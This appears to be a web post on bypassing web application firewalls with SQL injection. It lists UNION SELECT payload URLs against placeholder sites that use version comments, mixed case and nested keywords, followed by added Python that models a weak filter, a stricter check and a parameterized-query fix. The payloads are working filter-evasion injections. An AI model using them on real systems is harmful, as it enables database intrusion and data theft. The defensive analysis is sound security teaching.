
SQLi
http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5-- -
Bypassed SQLi
http://xyz.com/detail.php?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5-- -
The bypassed form wraps each keyword in a MySQL /*!...*/ version comment, which the server still parses as SQL but a keyword filter may skip over.
By Function Capitalization:-
Some web application firewalls match keywords only in lowercase, so the filter can be bypassed simply by changing the case of the letters.
Actual query
http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF
http://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5--
By Replaced Keywords:-
Some WAFs strip certain keywords such as UNION, SELECT and ORDER BY from the request. This can be used to our advantage by nesting the detected word inside a copy of itself: the WAF removes the inner copy once, and the surrounding characters join back into the original keyword.
Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- -
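As an added example (not part of the original post), the following Python models the weak filter that each of the bypasses above relies on, contrasts it with a check that normalizes input and rejects rather than sanitizes, and ends with the parameterized query that removes the injection entirely. The sample values are the id= portions of the payloads quoted on this page; the function names naive_sanitize, normalize, reaches_db, hardened_reject and safe_lookup are my own.

```python
import re
import sqlite3

# Constructed sample inputs: the id= values from the payloads quoted on this
# page (no live target involved), plus one benign value.
SAMPLES = {
    "plain":      "44 union all select 1,2,3,4,5-- -",
    "comment":    "44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5-- -",
    "mixed_case": "-1 uniOn SeLeCt 1,2,3,4,5--",
    "nested":     "-1 UNIunionON SEselectLECT 1,2,3,4,5-- -",
    "benign":     "44",
}
KEYWORDS = ("union", "select")

def naive_sanitize(value: str) -> str:
    """Model of the weak WAF the page describes: lowercase-only match, each
    keyword removed in one pass, and the 'cleaned' value forwarded onward."""
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value

def normalize(value: str) -> str:
    """Canonical form close to what MySQL parses: case-folded, /*!...*/
    version-comment wrappers opened, '+' and whitespace runs collapsed."""
    value = re.sub(r"/\*!\s*|\s*\*/", " ", value.lower())
    return re.sub(r"[\s+]+", " ", value).strip()

def reaches_db(forwarded: str) -> bool:
    """Does a UNION [ALL] SELECT survive in what the database would parse?"""
    return re.search(r"\bunion\b(\s+all)?\s+select\b", normalize(forwarded)) is not None

def hardened_reject(value: str) -> bool:
    """Normalize first, strip keywords to a fixed point, and reject outright
    (never forward a 'cleaned' value) if anything at all was removed."""
    text = before = normalize(value)
    while True:
        after = before
        for kw in KEYWORDS:
            after = after.replace(kw, "")
        if after == before:
            return before != text
        before = after

def safe_lookup(id_value: str) -> list:
    """The real mitigation: a bound parameter makes the value data, never SQL."""
    with sqlite3.connect(":memory:") as conn:  # constructed in-memory table
        conn.execute("CREATE TABLE detail (id TEXT, name TEXT)")
        conn.execute("INSERT INTO detail VALUES ('44', 'row44')")
        rows = conn.execute("SELECT name FROM detail WHERE id = ?", (id_value,)).fetchall()
    return [name for (name,) in rows]
```

naive_sanitize blocks only the plain payload and lets the other three through to the database, while hardened_reject refuses all four. Rejecting on any keyword hit will also refuse benign words such as "reunion", which is why keyword filtering is a stop-gap and the bound parameter in safe_lookup is the fix.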